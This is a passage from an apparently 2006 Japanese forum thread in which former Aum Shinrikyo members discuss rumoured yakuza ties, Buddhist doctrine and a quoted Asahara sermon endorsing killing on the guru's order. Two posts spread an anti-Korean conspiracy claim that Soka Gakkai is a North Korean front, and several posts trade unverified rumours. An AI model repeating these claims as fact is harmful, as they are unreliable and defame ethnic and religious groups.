で、ヤクザは意気揚揚ひきあげていったが、サマなは何にもわかんないんで
あれだけ怒って入ってきたヤクザが、教祖のお力で大人しくなった、と
関心していたっての
ただ、そいつがどうして、その現場を、教祖の会話まで聞ける距離で
目撃したのか、忘れた
どこか押し入れにでも隠れて聞いていたのかね

923 :名無しさん@3周年:2006/08/27(日) 21:47:53 ID:Ltlel/Qd
http://www.jca.apc.org/~altmedka/ron-38-ya2.html

今検索して見つけたサイト どのくらいの信憑性があるかはわからないけど
ただ、やっぱりほじくろうとすると、オウム以外のところから
脅しがきそうだね
まあ、でも、本当なら自分らから関係をもったんでしょう
貼って大丈夫かな

924 :名無しさん@3周年:2006/08/27(日) 21:51:15 ID:Ltlel/Qd
ヤフー検索で、オウム 暴力団 と引くといくつか出るけど
oumujiken no seiriseiton8 というのは踏んじゃだめ
ウイルスが仕掛けてある

漏れのはケンシロウが退治してくれたみたいだけど


925 :名無しさん@3周年:2006/08/27(日) 22:02:05 ID:Ltlel/Qd
923
は、ただの小説だろうか? 
ただ、918の書き手は、教祖が暴力団に金を渡したのを見たって書いている
両方とも小説で、作り話だろうか?

926 :名無しさん@3周年:2006/08/27(日) 22:07:14 ID:Ltlel/Qd
その話でいくと、オウムが暴力団に、金を渡すからなんとか
してくれろ(何をなんとかして、と頼んだのか?)と
暴力団で、いろいろかぎまわったと
したら、警察内部の腐敗がみつかったんで、それを突っ込んだと
で、大物政治家とか、絡むということかね

それを知らずに、オームグルとシヴァ大信に帰依しますと
信者はそればっか言って、金出すと
仮谷みたいのは、金もっているばかりに、付けねらわれて殺されたと
そういうお金が、暴力団に流れたかね
まあ、暴力団関与説は時々流れるらしいけど、怖いから(笑

もし、まあ、事実は明かされないのかもしれないけど
サマナが必死で、功徳積みましょうの、言って信者から取った金が
暴力団に流れていたら?


927 :阿左谷北:2006/08/27(日) 22:14:05 ID:UfKECvHi
>>892
やくざが仕切ってくれてるほうが、かえって安全なんですね。
かつて、宗教板に名を轟かした、阿佐谷北本人さんもなかなかの侠客でした。
時代は変わりましたね。何か寂しくもあります。
私なんぞは宗教板のチーマーですねw

928 :名無しさん@3周年:2006/08/27(日) 22:22:02 ID:UhdbI4FL ?2BP(0)
>だから、初期のアーガマでは、
>「渇愛を滅することが、苦の滅尽である」
>というような表現もされているわけ。

この初期のアーガマと、
初期以降の「3つの択法覚支」との関連性はどうなのでしょう?
つまり、「渇愛」と「三毒」との定義のすり合わせなわけですが。

929 :名無しさん@3周年:2006/08/27(日) 22:23:35 ID:XiTySC94
マ○パって信徒の女の子を襲ったり色々な事件を起こしていたので
かなり怪しいと思っていたが、スパイだったとは・・・


930 :名無しさん@3周年:2006/08/27(日) 22:30:15 ID:Ltlel/Qd
阿佐ヶ谷北、あんたどう思う
こういう関係のことを、わたしがここに書き込んでも
普段はじゃんじゃん書き込みがあるのに
しーんとするよね

そういう小説書きたい奴がネタにこの板除くのかしら


931 :阿左谷北:2006/08/27(日) 22:37:17 ID:UfKECvHi
>>930
σ(^^)俺に振ってるの?
なんか字が違うけど。

俺が思うに、しーんとしているときは
まあまあ面白いテレビ番組放送しているか、
セクースしているかだと思う。

932 :名無しさん@3周年:2006/08/27(日) 22:37:20 ID:Ltlel/Qd
たとえば、本当にオウムを早くつぶしたいなら
そういう関係を明らかにすれば、ホウホウの体で信者は逃げ出すよね
本当なら鼻先に突きつけてやれば良いとおもうけど、、
でも、それができない自浄があると

ただ、そのオウム帝国ってのの著者は、それほど信頼されていないらしいよね
読者のコメントによれば
その事件について口を出すと、警察関係者は出世コースから外されるのか

933 :阿左谷北:2006/08/27(日) 22:46:32 ID:UfKECvHi
やくざがいなくなると、警察が大量にリストラされる
カルトがなくなると、公安がリストラされるんじゃない?
相互依存関係なんだよ。
それで市民の生活が安泰ならいいじゃないかと。
やくざも、カルトもナチスみたいな独裁なら潰せるだろうけど、
そんなのは嫌じゃん?
自由主義なら、しょうがないね。

934 :和井 恵:2006/08/27(日) 23:03:27 ID:HdIJ+5N3
>>928
>初期以降の「3つの択法覚支」との関連性

「3つの択法覚支」というものは、特にアーガマには登場していません。
縁起の法を使った、私のオリジナルの表現です。

>「渇愛を滅することが、苦の滅尽である」

「十二縁起」と呼ばれている教えがありますが、
これらは後期に(あるいは死後に)なって、
「整備されて出てきたモノ」だと言われています。
そして私は、釈迦は「このような説き方」は
していなかったのではないか、と考えています。
これは、おそらく部派仏教の学僧達が、
「因果理論」を念頭に置いて、
「縁起」を顕そうとしたのだと思います。
これは「業感縁起」と呼ばれ、私は誤った解釈だと考えています。

「十二縁起」の原型となるような表現。
その、初期の形はもっとシンプルでした。
その中の一つの表現が「渇愛を滅することが、苦の滅尽である」なのです。
ただ、「このような蘊蓄」をくどくど説明しても、
余計な豆知識が増えるだけでしょ?
別に「実践」の役に立つわけではない。

>つまり、「渇愛」と「三毒」との定義のすり合わせなわけですが。

単純に「貪り」を、その代表格とも言える「渇愛」という言葉に置き換えた、
くらいに「ラフに」考えてくれた方が、有り難いんだけどね…
私は別に、「学問」を教えようとしているわけではないので。
これらを厳密に、頭の中でいくらあれこれ「定義」したところで、
「苦の滅尽」は起きないと思うけど。

935 :名無しさん@3周年:2006/08/27(日) 23:33:48 ID:Ltlel/Qd
まあ、そういう噂がどこまで信憑性があるかしらんけど
調べられないというのが、ね

で、調べられない、はっきりしないのをいいことに、教団も
本当のところはわからない、と気分よくして乗っかって
いまだ帰依しまーす、でお金が入るわけだろ?


936 :名無しさん@3周年:2006/08/28(月) 00:22:30 ID:ahTAwqvm ?2BP(0)
>単純に「貪り」を、その代表格とも言える「渇愛」という言葉に置き換えた、
>くらいに「ラフに」考えてくれた方が、有り難いんだけどね…

私もそのくらいの「ラフな」答えがほしかったんですよ。
別に学問的な定義のすり合わせがしたかったわけではなくて、
「渇愛」が三毒のどれに対応しているのか、
あるいは三毒全部のことを言ってるのか、
ということを、和井さんがどう捉えておられるのか、
という問いだったんですよ。
ですから、択法覚支云々という表現が和井さんのオリジナルなら、
それで理解できました。

「十二縁起」っていうのは、先ほど私が喩えたところの、
「このワラ束を誰が持ってきて置いたのか」というような、
いわば時系列的な因果関係だと理解すればよろしいですかね?

937 :名無しさん@3周年:2006/08/28(月) 00:23:55 ID:UkOrdc1x
信者は修行にしか興味を持たない
事件について知ろうとしない
だから、もし教団に絡んで金を吸い上げている奴がいるとしたら
そこらへんが、そいつらにかえって好都合なわけだ
どんなに教祖が疑わしかろうが
帰依をやめない 布施もやめない 金が入る
今はどうかしらないけど、、

938 :和井 恵:2006/08/28(月) 01:20:12 ID:J0rLCk3F
>>936
>私もそのくらいの「ラフな」答えがほしかったんですよ。

それは良かった。

>「渇愛」が三毒のどれに対応しているのか、
>あるいは三毒全部のことを言ってるのか、
>ということを、和井さんがどう捉えておられるのか、
>という問いだったんですよ。

私はちゃんと、916の中で「前振り(前もって説明)」しているよ。

  ただ、「三毒」は連動しているので、
  「貪り(渇愛)」を取り外すためには、

と、ちゃんと「貪り(渇愛)」と表現してるでしょ?

>「十二縁起」っていうのは、先ほど私が喩えたところの、
>「このワラ束を誰が持ってきて置いたのか」というような、
>いわば時系列的な因果関係だと理解すればよろしいですかね?

そう。後世の学僧達が、
おそらく無理やり「時系列的な解釈」を創作したのだと思う。
これは、「縁起の法」を「カルマ(因果関係)の法則」と
勘違いさせるようなもの。
だから、「業(=カルマ)感縁起」と呼ばれている。

私が以前別な人と、「因果関係」と「相関関係」で揉めたのも、
そこがポイント(論点)だったわけ。

939 :名無しさん@3周年:2006/08/28(月) 01:32:33 ID:UkOrdc1x
和井さんよ、なんか思い当たることでもないのかね
わざとらしく触れようとしないみたいに見えるがね



940 :名無しさん@3周年:2006/08/28(月) 01:36:34 ID:ahTAwqvm ?2BP(0)
あら、単純に(渇愛)を見落としてました。(^_^;)

結局オウムの人間が認識している「縁起の法」って、
「十二縁起」の方で、しかもそれをニルヴァーナから
落っこちてきたプロセス、と考えているわけだから、
それは誰がどう見ても立派な「時系列」ですよね。

思うに、オウムに限らず、日本人に与えられてきた
仏教情報を考えれば、
おそらく「時系列」の方を連想しやすいでしょうね、日本人は。

941 :名無しさん@3周年:2006/08/28(月) 01:48:00 ID:1PjV6KT6
創価は教祖が北朝鮮人だし統一教会の手先の日本転覆カルト教団。
オウムの幹部の多くは創価の人間。
まだ知らない人間が多いが、いざという時 朝鮮総連の工作員とともに日本国で騒乱を起こす集団だよ。
麻原の口封じの為 あらゆる立場の人間を使って薬漬けにして廃人にして証拠の隠滅、真実の暴露を
必死で防ぐ超売国カルト キチガイ集団 朝鮮の手先・・・・それが創価学会

創価学会は北朝鮮宗教である
http://Www15.ocn.ne.jp/~oyakodon/newversion/sokakitacho.htm
http://Www15.ocn.ne.jp/~oyakodon/newversion/yudatesaki.htm

創価が単なる気持ち悪い宗教団体だったらいいのだけど現実は
日本を破壊するためのカルト。オウムを育てたのも創価だし
皇室典範から人権擁護法案と言う名の日本人逆差別法案まで
何から何まで反日的宗教。SGIは統一教会と共に韓国では反日
活動をしている。


942 :和井 恵:2006/08/28(月) 01:56:14 ID:J0rLCk3F
>私が以前別な人と、「因果関係」と「相関関係」で揉めたのも、
>そこがポイント(論点)だったわけ。

つまり、縁起というものを時系列的な流れとして、
「過去(因)・現在(途中経過)・未来(果)」のように捉えてしまうと、
原因は、すでに「過ぎ去ってしまった過去のこと(既成事実)」なので、
それを直接変えることは出来なくなる。
だから、現在行うことは「過去の過失の尻ぬぐい」でしかなくなる。
そして、「未来の果への準備や種まき」になってしまう。
その後は、その未来の結果が顕れてくるのをじっと待っているだけ…

ところが、これを「今現在起きていること」と捉えるとどうなるか?

三つのワラ束の中の一つを選んで取り除く。
これは「今、直接出来ること」だよね。
だって、原因は「過ぎ去った過去」にあるのではなくて
今すぐに手の届く「目の前にある」のだから。
そして、その中の「一束」を選んで鷲掴みにして引き離せば、
目の前で「三つのワラ束の相関関係(=無明)」は崩壊するんだ。
わざわざ「未来の果」を、首を長くして待つ必要はない。

つまり、「因」も「果」も、すぐに手の届く目の前にある、
という「認識」を与えてくれるのが「縁起の法」の本質なの。
つまり、来世(未来)や過去世(過去)などを考える必要のない、
「現世のみにポイントを絞った成就の法則」なんだよ。

943 :和井 恵:2006/08/28(月) 01:57:56 ID:J0rLCk3F
>和井さんよ、なんか思い当たることでもないのかね
>わざとらしく触れようとしないみたいに見えるがね

何のこと?具体的に言ってくれないかな…


944 :和井 恵:2006/08/28(月) 02:03:44 ID:J0rLCk3F
>「現世のみにポイントを絞った成就の法則」なんだよ。

「現世(現在)のみにポイントを絞った成就の法則」なんだよ。

945 :和井 恵:2006/08/28(月) 02:14:24 ID:J0rLCk3F
>何のこと?具体的に言ってくれないかな…

ああ、今ここのレスの流れを読み返して、
何を言いたいのかようやく解ったよ^^
「縁起の法」の説明に集中していたから、
そちらの方に意識が向いていなかった…

「暴力団」関係、の方の話の事ね^^


946 :和井 恵:2006/08/28(月) 02:17:01 ID:J0rLCk3F
>「暴力団」関係、の方の話の事ね^^

この話を聞きたいの?


947 :和井 恵:2006/08/28(月) 02:27:42 ID:J0rLCk3F
返事がないなぁ…

948 :和井 恵:2006/08/28(月) 02:44:32 ID:J0rLCk3F
時間(タイムリミット)なので、今日はこれで終わりにします。

949 :名無しさん@3周年:2006/08/28(月) 04:38:56 ID:xgY+ZVzf
>>879
アーカシックレコードにアクセスするのは難しい。
修行の鬼であった故カッピナ師も、
それはできなかった。
6万年ぐらい修行したら、
アクセスできるようになるらしい。
もし前生で5万9999年ぐらい修行していたら、
一年ぐらいの修行でアクセスできるかもしれない。

950 :名無しさん@3周年:2006/08/28(月) 04:41:56 ID:g2XOeNPU
恐怖からくる苦は三毒のどれに入るのかな?

951 :名無しさん@3周年:2006/08/28(月) 04:43:34 ID:g2XOeNPU
>>949
しかし尊師はヒマラヤでの8年の修行中に
触れることができたと・・・。

952 :名無しさん@3周年:2006/08/28(月) 04:50:39 ID:g2XOeNPU
現在の苦を取り外す。これは非常に実践的である。
しかし、尊師は苦そのものを全く生起させないことに
主眼をあてたように思う。
現在を含めこれから未来の死ぬまでに少しの苦も生起させない
方法。これが重要なのでは?
苦の滅尽ではなくさらに根本の苦を発生させない修行、理論。
これは必要だね。



953 :名無しさん@3周年:2006/08/28(月) 05:03:36 ID:UarZ5ZFM
>>655
>逆に、相手を苦しめなければ、苦の総量は減るのでしょ?

人として生活するとき、
他の魂を全く苦しめずに善業をなすことは不可能。

例えば、ある女性と結婚して幸福な家庭を作ったとしても、
その女性を好きだった別の男性にとっては苦しみ。

大きな会社を作って、その会社の社員に高い給料を出して、
その会社の社員を現世的な幸福にしたとしても、
それだけ、その会社が繁栄しているのならば、
ライバル会社は倒産しかかっているかもしれない。

つまり、特に意識しなくても、
人に苦しみを与えてしまうということではないでしょうか?

そういう意味で、
苦が現れる可能性の最大値は常に一定なのではないでしょうか?

954 :名無しさん@3周年:2006/08/28(月) 05:18:05 ID:g2XOeNPU
>>953
例えば、苦を滅尽する方法をある人から教えてもらったとする。
本人は至上の喜びとしてうれしいが
例えば別の宗教等で全く違う考えを持っている人は
そんな苦の滅尽方法はまやかしだと言って激怒する。
挙句の果て自分の教えを聞いてもらえなくなる危険もでてくる。

すなわち過去、現在、未来を統括的に知覚し、捉える
必要がある。しかし、未来だけは見ることができない。
そういう意味では常に現在に縛られながら存在しているのが
私達である。




955 :名無しさん@3周年:2006/08/28(月) 05:27:39 ID:g2XOeNPU
人の数だけ相対的に意識が存在する。
どこを中心にして良い状況とするかがポイントになる。
特に社会の中では。

956 :名無しさん@3周年:2006/08/28(月) 05:33:11 ID:g2XOeNPU
まあすなわち尊師が提示された真理法則を皆が実践すれば
必ず苦の無い幸せの世界が訪れると。
宇宙のシャンバラ化だ、始めよう、いいね?

957 :名無しさん@3周年:2006/08/28(月) 06:08:38 ID:0NmC1RAu
>>819
>首のホネ 折った数だけ ステージUP

それは全く正しい。
もともとオウムはそういう団体だった。
尊師はそういう話を説法に、
ちょこ、ちょこっと挿入しているので、
説法を何回も聞いている人は、
案外違和感がない。

(尊師)
シャンバラというのはタントラヤーナで成就した人たちが、
行く世界だと考えてください。
タントラヤーナの連中は、
どういうことを考えるかっていうと、
例えばグル、例えば、このシヴァ神が、
ここにいらっしゃって、
シヴァ神が、おまえ人を殺してこいって言ったら、
はいって言ってもうそのまま即、
出刃包丁をもって刺すという、
こういう人たちが集まっているわけです。

そして、わたしもシャンバラから来てますので、
そういう意味でいったら出刃包丁組ですので、
気をつけてください(一同笑)


958 :阿左谷北:2006/08/28(月) 07:05:38 ID:wE0ca/Bz
笑い事じゃないですよね(>_<)

959 :和井 恵:2006/08/28(月) 07:21:54 ID:J0rLCk3F
>>950
>恐怖からくる苦は三毒のどれに入るのかな?

おそらく「無知」でしょうね…
「幽霊の、正体見たり枯れ尾花」

960 :和井 恵:2006/08/28(月) 07:32:22 ID:J0rLCk3F
>>952
>現在の苦を取り外す。これは非常に実践的である。
>しかし、尊師は苦そのものを全く生起させないことに
>主眼をあてたように思う。

私たちに苦しみが生起する「根本原因」は「無明」があるから。
「十結」の最後に来るモノも、この「無明」である。

>現在を含めこれから未来の死ぬまでに少しの苦も生起させない方法。
>これが重要なのでは?

それが、「無明」を滅することなの。

>苦の滅尽ではなくさらに根本の苦を発生させない修行、理論。
>これは必要だね。

「さらなる根本の苦」とは、何を指すのかしらね^^
「苦の滅尽」の「苦」とは、
四苦八苦を含めた「全ての苦しみ」のことなんだけどね。

961 :名無しさん@3周年:2006/08/28(月) 07:54:26 ID:wRr6evry
キャンディ→丑→シャバ→和井

独演会

962 :名無しさん@3周年:2006/08/28(月) 09:09:45 ID:g2XOeNPU
>>960
とはいえ人は生きることい執着している。これは事実。
呼吸をしばらく止めてみなさい。苦しいと思うだろう。
そのままではいやだろう。
あなた自身呼吸を止めたままでは辛い(苦しい)と思うはずである。
それは生に執着があるからに他ならないんだよ。


963 :松山義人:2006/08/28(月) 09:22:51 ID:m7M9DNBy
チベットのダライラマのいる宗派は昔から仏教改革を行っていた。
モンゴルではダライラマの仏教が流行したが、清の政府は満州族でモンゴルではない。
チベット仏教はとばっちりを受けたのだ。

孫文は「もう皇帝崇拝なんかいらない!」と書いている。

毛沢東は「下からの革命」で、仏教や儒教に造詣の深い皇帝なんてやめて、
そんなのもの、有色人種であってもローマカトリックと似たりよったりなのであるから、
彼が個人崇拝を許した理由は、農民の立場が見えないインテリ皇帝よりは、
自分にしてくれたほうが幸せじゃないのかなあ、という了見だった。

仏教芸術は、知識人(=金持ち)を称える分野のものなので、フランスで見たようなアフリカ人を称える芸術作品とは違ったものである。毛沢東は知識人も憎んだ。

ところが毛沢東はフランスから学ぶには、アフリカの芸術よりは、ナポレオンの頭脳に
惚れこんでしまったようだ。彼は知識人である。

皇帝崇拝が醜いと言われたのは、スプラッタ・ホラー映画のような話題がでてきそうだからだ。東洋思想に造詣の深い皇帝様とやらは何を言い出すかわからない。
ところが、共産主義はスプラッタ・ホラー映画の悪霊のような行動をとるのが好きなので、せっかくの中国政府のほほえましい善意は何もかも無駄になってしまった。

964 :松山義人:2006/08/28(月) 09:27:47 ID:m7M9DNBy
世界中の軍隊が集まってモンゴルで軍事演習することになった。

文化大革命のちょっと前に芸術革命というものがあった。
圧制者と戦う農民がテーマの芸術作品を毛沢東は要求した。
農民の風景の山や野は美しいだろう・・・。

騎馬民族らは定住しないでジプシー生活を続けるには、
武力の力で略奪品で金銭を得ていた時期があった。

そのような美意識の上でインテリを称えても何になるのか。
農民の為の自然こそが、美しいのだ。
圧制者の所有する宗教芸術作品なんていらねえ!いらねえよ!

と、毛沢東は考えていたようだ。

965 :名無しさん@3周年:2006/08/28(月) 09:50:22 ID:g2XOeNPU
>>宮下杏菜
A派が汚いことをしていると?
仮にそう思えたとしてもそれはあなたの主観にすぎないのである。
あなたの主観が全ての人にとっての真実かは証明はできないのである。
教団関係者を脅すような発言はやめるべきである。
警察のご厄介になったらもうここへ書き込むのも苦痛になるぞ。



966 :名無しさん@3周年:2006/08/28(月) 10:08:08 ID:2Quf14fk
>>965

> 教団関係者を脅すような発言はやめるべきである。
> 警察のご厄介になったらもうここへ書き込むのも苦痛になるぞ。

そういうあなたは杏菜ちゃんを脅しているわけですね(*^^*)。


967 :名無しさん@3周年:2006/08/28(月) 10:30:25 ID:L4xDQCGw
和井恵殿に問い申す。
如何なる理をもって三毒を三束の藁に喩え得るや?
三毒が藁の塔と性質を同じうするがごとく語られる上は、
その理をば是非ともご教授賜りたし。

968 :名無しさん@3周年:2006/08/28(月) 10:38:35 ID:UPhx7ZQQ
>>957
私もその説法を聞いたとき笑っていたのだろうけど、
実は笑い事ではなく、
リアルな発言だった。

969 :和井 恵:2006/08/28(月) 10:41:54 ID:J0rLCk3F
>>953
>人として生活するとき、
>他の魂を全く苦しめずに善業をなすことは不可能。

ほう。

>例えば、ある女性と結婚して幸福な家庭を作ったとしても、
>その女性を好きだった別の男性にとっては苦しみ。

しかしそれは、その女性がその男性を苦しめた、と言うよりも、
その男性が「自分で自分の首を絞めた」のでは?
つまり、「独り相撲をしている」。

君の理論は「ストーカー理論」みたいだね^^;
女の子を勝手に追い回し、交際を迫って脅迫する。
それを誰かが叱ると「悪いのは俺じゃない、
俺をこんな気持ちにさせた相手が悪いんだ!」
と、「責任転換」をする…

970 :和井 恵:2006/08/28(月) 10:42:45 ID:J0rLCk3F
>大きな会社を作って、その会社の社員に高い給料を出して、
>その会社の社員を現世的な幸福にしたとしても、
>それだけ、その会社が繁栄しているのならば、
>ライバル会社は倒産しかかっているかもしれない。

それは、ライバル会社自体に問題があったからでしょ?
汚い「裏工作」をして、相手を倒産に追い込んだので無い限り、
そのような理論は「自己責任の放棄」にしかすぎない。
一種の「甘え」だね。自立できない人の…

>つまり、特に意識しなくても、
>人に苦しみを与えてしまうということではないでしょうか?

「自己責任(自己を根本とし、自己を島とする)」ということを、
もっとしっかりと考えた方がいいのでは?

>そういう意味で、
>苦が現れる可能性の最大値は常に一定なのではないでしょうか?

「可能性」と言いながら、何故その後に「最大値は常に一定」という
意味不明の解釈が加わるのですか?
根拠が何もない「思い込み」ですよね、それは。

結局、最後の「苦が現れる可能性の最大値は常に一定」という結論を
何とか「正当化」させたいが為の「妄想(後付けの屁理屈)」ですね。

971 :名無しさん@3周年:2006/08/28(月) 11:01:40 ID:UPhx7ZQQ
>>969>>970
私は現世的な幸福のパイは一定であり、
だれかがパイを食べたら、
他の人が食べられなくということが多い、
ということを言いたかったのですが…。

一人区の選挙区で当選する人は一人しかいないし、
定員が60人の大学学部に合格する人は60人しかいない。
当選した人や合格した人に悪意はないけれど、
結果的に落選した人や、不合格となった人は苦しむ。

これは結局、ライオンが鹿を食べて、
食べられた鹿が苦しむのと同じ理屈ではないでしょうか?
ライオンには悪意はないし、
生きていくために食べなければならない。

972 :和井 恵:2006/08/28(月) 11:07:59 ID:J0rLCk3F
>>954
>例えば、苦を滅尽する方法をある人から教えてもらったとする。
>本人は至上の喜びとしてうれしいが
>例えば別の宗教等で全く違う考えを持っている人は
>そんな苦の滅尽方法はまやかしだと言って激怒する。

他の人が教えた「苦を滅尽する方法」を聞いて
「激怒する」のは、その人の心が未熟だから。
まずはその方法の「真・偽」を、
冷静に検討してみるのが普通でしょ?

「まやかし」であるのなら、
鼻で笑って相手にしなければいい。
落ち着いて、「自分の信じる道」を進めばいいのでは?

>挙句の果て自分の教えを聞いてもらえなくなる危険もでてくる。

そんな「危険性」が出てくるのならば、
その人の「教え」の方に問題があるのでは?

973 :和井 恵:2006/08/28(月) 11:08:54 ID:J0rLCk3F
>すなわち過去、現在、未来を統括的に知覚し、捉える必要がある。

何の脈絡もなく、急に話が変わってしまった…
今までの説明との「関連性」が意味不明。
「すなわち」という言葉の使い方を間違えているのでは?

「過去、現在、未来を統括的に知覚し、捉える必要がある」
と主張したいのならば、その理由(根拠)を、
もっと明確に説明する必要があると思います。

>しかし、未来だけは見ることができない。

そうなの?
コーザルへ飛んで、調べられると聞いたことがあるような気が…
そういう主張は、もうしないのかな?

>そういう意味では常に現在に縛られながら存在しているのが
>私達である。

いいえ、私たちは「過去からの呪縛」と
「未来への幻影」に囚われて、
「今を生きる」ことを忘れてしまっているのです。

974 :和井 恵:2006/08/28(月) 11:14:22 ID:J0rLCk3F
>>955
>人の数だけ相対的に意識が存在する。
>どこを中心にして良い状況とするかがポイントになる。

基本は、「自己を根本とする(自己責任)」。
だからこそ、自己を磨く修行が必要になる。

>特に社会の中では。

バランス(中道)感覚が大切なのでは?

975 :和井 恵:2006/08/28(月) 11:24:17 ID:J0rLCk3F
>>962
>とはいえ人は生きることい執着している。これは事実。
>呼吸をしばらく止めてみなさい。苦しいと思うだろう。
>そのままではいやだろう。
>あなた自身呼吸を止めたままでは辛い(苦しい)と思うはずである。
>それは生に執着があるからに他ならないんだよ。

私は以前から言っているように「生命欲」を否定していない。
「無明」を滅すれば、生命欲を否定する必要はなくなる。

呼吸停止は、そのうち出来るようにするつもり。
その方面の訓練を、少し始めたところだから。

君の理屈から言うならば、生命欲を絶って、
「自殺する」のが最善策なのかな?

976 :阿左谷北:2006/08/28(月) 11:27:55 ID:wE0ca/Bz
和井さん、こんにちは^^

プレステージって、メーカー名ですか?
作品名ですか?
レンタルビデオ店に行ってみましたが、見つかりませんでした。
くれくれ君で、すいませんm(__)m

977 :名無しさん@3周年:2006/08/28(月) 11:30:50 ID:2Quf14fk
次スレはこちらに準備しました(*^^*)
http://life7.2ch.net/test/read.cgi/psy/1156732111/

978 :和井 恵:2006/08/28(月) 11:44:23 ID:J0rLCk3F
>>971
>私は現世的な幸福のパイは一定であり、
>だれかがパイを食べたら、
>他の人が食べられなくということが多い、
>ということを言いたかったのですが…。

「現世的な幸福のパイ」は「一定」ではありません。
絶えず変動しています。
つまりそれは「無常」なのです。
企業は、色々な市場分析を重ねて、
「新しい市場」を開拓していくのです。
「市場」は「購買人口数」や
「景気の変動」などによって変化します。
人々の「購買意欲」によっても変わりますよね。
ですから、「一定(恒常)」では無いと思います。


979 :和井 恵:2006/08/28(月) 11:45:20 ID:J0rLCk3F
>一人区の選挙区で当選する人は一人しかいないし、
>定員が60人の大学学部に合格する人は60人しかいない。
>当選した人や合格した人に悪意はないけれど、
>結果的に落選した人や、不合格となった人は苦しむ。

選挙区の「区域」も、時代によって変化します。
中選挙区制、小選挙区制の違い。
また、議員定数も変化しようとしているでしょ?
「小さな政府」を造ろう、とか言って…

学校の試験に受かる、受からない、や
会社に採用される、されないと「苦しみ」とは
直接の関係はありません。

採用された会社が、実は大きな負債を抱えていて、
すぐに倒産してしまうことだってあるし、
不採用になったおかげで、その後別の道が開け、
別の分野で活躍する人もいる。

「在る出来事」を否定的に捉えるか、
あるいはそれを一つのチャンスと肯定的に捉えられるかは、
その人の資質とともに、普段の「心の使い方」によるのでしょうね。

980 :和井 恵:2006/08/28(月) 11:47:44 ID:J0rLCk3F
>これは結局、ライオンが鹿を食べて、
>食べられた鹿が苦しむのと同じ理屈ではないでしょうか?
>ライオンには悪意はないし、
>生きていくために食べなければならない。

少し違うと思います。

981 :名無しさん@3周年:2006/08/28(月) 11:51:28 ID:lflCyLmc
和井も北もわざと触れないのか
そうだよ、暴力団関係について知りたい
避けたい話題だから、この話をフルと返事ないのかなあ

もし本当だとすれば、オウム関係者の誰でもにとって
甚大な影響があるし
教祖がどんな考えでいたかわかるのに
幸せにしてやるって、金むしって、単に命を助けてもらった暴力団に
義理立てして金渡していたって、ことなのかね

982 :名無しさん@3周年:2006/08/28(月) 11:55:07 ID:lflCyLmc
漏れは、事件について知っても、悟れるわけじゃない、って
悟り済まして知ろうとしない奴が、聖人ぶって布施圧集めて
人を脅かして生き血をすすって生きているような連中に
知らぬ間に貢いでいたとしたなら、暴力団以下だと思う

暴力団は、いかにも俺たちは悪いんだ、て顔をしているから用心のしようがあるが
表向き善人では、さけようがない
そっちのほうが立ちが悪い

983 :阿左谷北:2006/08/28(月) 11:57:37 ID:wE0ca/Bz
俺は、ただの下っ端財施サマナだったけど
暴力団関係の話は聞いたことないよ。

984 :阿左谷北:2006/08/28(月) 11:59:45 ID:wE0ca/Bz
チヅオやニイミは見るからに悪人だろw

985 :名無しさん@3周年:2006/08/28(月) 12:09:21 ID:lflCyLmc
957シャンバラというのはタントラヤーナで成就した人たちが、
行く世界だと考えてください。
タントラヤーナの連中は、
どういうことを考えるかっていうと、
例えばグル、例えば、このシヴァ神が、
ここにいらっしゃって、
シヴァ神が、おまえ人を殺してこいって言ったら、
はいって言ってもうそのまま即、
出刃包丁をもって刺すという、
こういう人たちが集まっているわけです

では聞くが、それは教祖が弟子に語って聞かせたシャンバラの様子でしょう
それは、他の仏典などに記述がありますか
あるいは誰かが、そういう世界を見ましたか?
教祖は、救済のためなら、あることをない、ないことをあると、平気でいいますよね
その話も作り話かもしれないのに
本気で取った弟子が、喜んで人殺したのかもしれませんよ

986 :名無しさん@3周年:2006/08/28(月) 12:13:16 ID:lflCyLmc
どうして、サリンを撒いたのを自分の目で見たわけじゃないから
教団の犯行だと思わないって、考えの人が
みたこともないシャンバラの様子を聞いて、きっとそうなのだと
信じ込めるんだろう
人を殺す必要が生じたから、作り話しただけかもしれないじゃないか
そんな、乱暴な部分を信じ込んで、、

987 :名無しさん@3周年:2006/08/28(月) 12:18:10 ID:lflCyLmc
第一、殺人した自分らの罪を抹消したいがために
金を積んで暴力団に、警察の弱みをついてゆすってもらったとして
そういう立場に自分を追い込んだのは誰だよ
教祖が、すぐに殺せ殺せ、って言って、弟子もホイホイ殺すからじゃないか!
まあ、本当の話かわからないけど、、

その隠蔽のために、LSDイニとかこしらえて、巨額の金を集めて
信者だまして(LSDイニなんて、薬物効果だけで、イニシエションとはいえない)
それを、便宜を図ってもらうために、横流ししていたのか?
じゃあ
私みたいな若い女性を労働させて、騙してまで金とって、
グルのためとか、いっているけど、本当はグルのヘマを隠すためで、、
あんたら人を犠牲にしているんだよ自覚あるのかね

988 :名無しさん@3周年:2006/08/28(月) 12:20:27 ID:lflCyLmc
いい気になっているようだけど、もしグルを信じるならカルマを
信じるだろう
その、人をだまして金取り上げたってのは、自分らに返るんだぜ?

989 :和井 恵:2006/08/28(月) 12:22:44 ID:J0rLCk3F
>>967
>和井恵殿に問い申す。
>如何なる理をもって三毒を三束の藁に喩え得るや?
>三毒が藁の塔と性質を同じうするがごとく語られる上は、
>その理をば是非ともご教授賜りたし。

お手数でしょうが、まずはこの76スレの
>>778を参照してみて下さい。

それと、お時間があるようならば、

「インド哲学と仏教哲学の探究」過去ログ2208からの
私の説明にも目を通して頂けると有り難いですね。
→ http://otd11.jbbs.livedoor.jp/Kaivalya/bbs_plain?range=-20&base=2220

その上で、もう一度質問をしてみて頂けますか?
その方が、より新しい角度からの説明も出来るかもしれませんので。

990 :名無しさん@3周年:2006/08/28(月) 12:26:51 ID:lflCyLmc
公安のスパイが成就者クラスになっていたという話がある
本当かはわからない あるいは、よその団体の人間がスパイに入っていたとも

しかし、よそからスパイに着ただけの人間が、
オウムの厳しい修行に耐えて、成就できるものかね
ただ、内部事情を調べにきただけの、求道心も無いのが
もしいたとしたら、彼らはミイラ取りがミイラになったということか

991 :名無しさん@3周年:2006/08/28(月) 12:38:40 ID:lflCyLmc
これは、どのくらいの信憑性があるだろうか
まあ、オウムにとっては割と都合のよい話だし、以前からささやかれてはいたようだけど
私はどうせ、フリーメーソンに罪をなすりつけるように、草加の仕業といいたい連中の
作り話だと、思っていたけども、、

5.オウム真理教は創価学会の傀儡だった。創価はオウムを使って日本半島同時
騒乱を計画していたが中断した。再始動する恐れがある■
そして、最後にオウム(参考G)です。オウムもまた、北朝鮮のためにでっち
上げられた宗教でした。そして、創価・統一から朝鮮人の信者が送り込まれ、
